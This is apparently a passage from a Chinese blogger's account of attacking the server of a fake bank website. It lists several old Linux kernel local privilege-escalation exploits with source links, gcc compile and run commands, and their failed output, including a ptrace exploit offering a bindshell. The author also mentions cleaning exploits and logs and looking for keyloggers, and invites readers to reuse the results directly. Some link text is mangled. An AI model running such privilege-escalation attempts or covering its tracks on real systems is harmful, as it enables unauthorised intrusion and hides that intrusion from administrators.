我那次入侵中国虚假银行的实录

[ ] SLAB cleanup
[-] FAILED: get_slab_objs: /proc/slabinfo not readable? (No such file or directory)
sh: line 9: 24080 Killed ./elflbl_v109
------------------------------------------------------------------------


（3）Linux内核本地整数溢出和内存泄露漏洞
fun with linux kernel
URL：
_bug&do=view&bug_id=7269&keyword=" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7269&keyword=
_blank>http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
测试：

gcc -o vc vc_resize.c
./vc_resize
------------------------------------------------------------------------
open: No such device or address
------------------------------------------------------------------------
gcc memory_leak.c -o memory_leak
------------------------------------------------------------------------
memory_leak.c:80:2: warning: no newline at end of file
------------------------------------------------------------------------


（4）Linux Kernel do_mremap VMA本地权限提升漏洞
Linux kernel do_mremap VMA limit local privilege escalation
URL：
_bug&do=view&bug_id=6102&keyword=提升" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=6102&keyword=提升
_blank>http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
文档：
_pte.c" target=_blank>http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c
测试：

gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
./mremap_pte
------------------------------------------------------------------------
[ ] kernel 2.4.20-021stab022.11.777-enterprise vulnerable: YES exploitable YES
MMAP #65530 0x50bfa000 - 0x50bfb000
[-] Failed
------------------------------------------------------------------------


（5）Linux Kernel kmod/ptrace竞争条件权限提升漏洞
linux kmod/ptrace bug - details
URL：
_bug&do=view&bug_id=4570&keyword=提升" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4570&keyword=提升
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
文档：
_blank>http://august.v-lo.krakow.pl/~anszom/km3.c
测试：

gcc -o km3 km3.c
./km3 ?
------------------------------------------------------------------------
Usage: ./km3 [-d] [-b] [-r] [-s] [-c executable]
-d -- use double-ptrace method (to run interactive programs)
-b -- start bindshell on port 4112
-r -- support randomized pids
-c -- choose executable to start
-s -- single-shot mode - abort if unsuccessful at the first try
------------------------------------------------------------------------
./km3 -s
------------------------------------------------------------------------
Linux kmod ptrace local root exploit by <anszom@v-lo.krakow.pl>

=> Simple mode, executing /usr/bin/id > /dev/tty
sizeof(shellcode)=95
=> Child process started..........
Failed
------------------------------------------------------------------------


（6）Linux Kernel i386 SMP页错误处理器特权提升漏洞
Linux kernel i386 SMP page fault handler privilege escalation
URL：
_bug&do=view&bug_id=7338" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7338
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
测试：

gcc -o smp smp.c
./smp
------------------------------------------------------------------------
[ ] in thread 1 (pid = 5400)
[ ] in thread 2 (pid = 5401)
[ ] rdtsc calibration: 53428
[ ] exploiting race, wait...
[-] unable to exploit race in 30s,
kernel patched or load too high.
------------------------------------------------------------------------


尝试多个本地提权均未能成功！很郁闷！而在测试过程的时候，虚假网站已被关闭了，虽然文档还在，但是很明显官方已作了努力，并得到了不错的结果。
6、其他
找了几个linux的键盘记录，都要root权限。而服务器远程连接使用的ssh的，使用sniffer也估计没戏，所以暂时也没什么思路，清理exp、日志文档。
以上是我的一些测试的结果，结果也没有拿到root，但是我整理了一下相关的漏洞，希望对大家以后有些帮助。在站长群里发布了相关的结果，也没有人回话，不知道大家是太忙。。。
文中并未特别处理漏洞及结果，有兴趣的能够直接利用，但是没必要为难其他站点，我想大家明白我的意思！
折腾了这么久，更有好多工作的事情要做！希望不会被老板说，呵呵！
最后感谢Edward、老黑及几位公司的高人